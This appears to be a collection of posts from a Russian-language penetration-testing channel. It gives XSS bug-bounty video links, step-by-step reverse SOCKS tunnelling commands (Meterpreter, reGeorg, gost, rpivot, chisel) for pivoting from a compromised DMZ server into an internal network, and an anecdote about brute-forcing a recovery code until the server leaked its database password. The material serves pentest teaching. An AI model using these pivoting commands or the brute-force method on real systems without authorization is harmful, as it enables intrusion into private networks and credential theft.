How i found Stored XSS in Google Books
https://www.youtube.com/watch?v=eZBGBMQzmGI

Steam XSS $7,500 | Bug bounty 2018
https://www.youtube.com/watch?v=aybCeXhEjsA

The Ultimate Red Team Roadmap | from indus
https://www.youtube.com/watch?v=XvUFd71HljE

Материал про пентест 1С

Существует много способов построить reverse socks туннель. Давайте рассмотрим 3 самых простых.
- Meterpreter
Строим сессию meterpreter (пусть она будет под номером 1).
Далее запускаем socks сервер use auxiliary/server/socks_proxy и прописываем route в сессию метерпретер:
route add 192.168.0.0 255.255.0.0 1
Всё, теперь залетая в 127.0.0.1:1080 мы вылетим во внутренней сети(proxychains или tsocks кому как удобнее).
Возможно кто нибудь из олдов скажет, что этот способ плохой и будь мы в 2020 году - я бы согласился, тогда модуль назывался auxiliary/server/socks4a и работал он из рук вон плохо, но времена меняются.
- reGeorg
Используем инструмент https://github.com/sensepost/reGeorg. Если вы проломили сервер в DMZ, то скорее всего там есть PHP, ASP или JSP приложение. Стоит загрузить соответствующий файл на сервер, запустить у себя клиент - и вот мы через HTTP туннель вылетаем во внутреннюю сеть.
- Gost
Способ которым пользуюсь я сам. Невероятно мощный инструмент https://github.com/ginuerzh/gost, на узле В запускаем gost в интернете:
gost -L socks5://user:pass@0.0.0.0:1337
На узле А запускаем 2 госта:
./gost -L socks5://user:pass@127.0.0.1:13338&
./gost -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://user:pass@<ip B>:1337&
всё, теперь подключаемся к порту 13381 на узле D и выходим в DMZ. Как бонус мы установили логин/пароль на socks и повесили порт на сервере B в Интернет.
Инструмент gost очень надёжный и построив один раз туннель можете не переживать, он и через месяц будет работать, как говорится "без единого разрыва!".
Есть и другие инструменты, в том числе и встроенные, например, ssh. Первым шагом на сервер B пробрасываем 22 порт, а потом на сервере B подключаемся в него с опцией -D, но этот способ может быть не всегда удобен.

Есть прекрасная статья https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6 которая вам подробнее расскажет про магию SSH.
Еще есть вариант с помощью инструмента Rpivot(https://github.com/klsecservices/rpivot):
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0

Client side:

python client.py --server-ip <ip> --server-port 9999

As a result, a socks4 proxy service will be bound server side on port 1080.

Еще вариант от уважаемого гостя нашего канала (@snovvcrash)
Используя chisel:

(B) $ ./chisel server -p 1337 --reverse --socks5 --auth hax0r:'Passw0rd!'
(A) $ nohup ./chisel client --fingerprint <FINGERPRINT> --auth hax0r:'Passw0rd!' 8.8.8.8:1337 R:127.0.0.1:1080:socks &
(B) $ proxychains4 -q hacktheplanet.py 10.10.13.37

где 10.10.13.37 - какая-нибудь тачка из внутренней сети
Верно ответили на вопрос:
@Lizzmack
@heart1ess
@drakylar
@snovvcrash
#вопросответ

Искал медь, а нашёл золото

Решил проверить наличие защиты от перебора кода при восстановлении доступа к аккаунту. Код восстановления состоял из 4 символов. Взял фаззер, по умолчанию выставил 50 одновременных потоков, запустил перебор и не обнаружил никаких rate limit'еров. Время жизни кода было небольшим - всего 60 секунд, а ответ от сервера занимал несколько секунд. При таких условиях времени перебрать все возможные варианты попросту не хватило бы

Выставил 1000 потоков и... забил все доступные слоты для подключения к БД 😬
В результате сервер в теле ответа вернул детали ошибки. В одной из строчек присутствовал пароль от БД в открытом виде 😎

И такое бывает 😁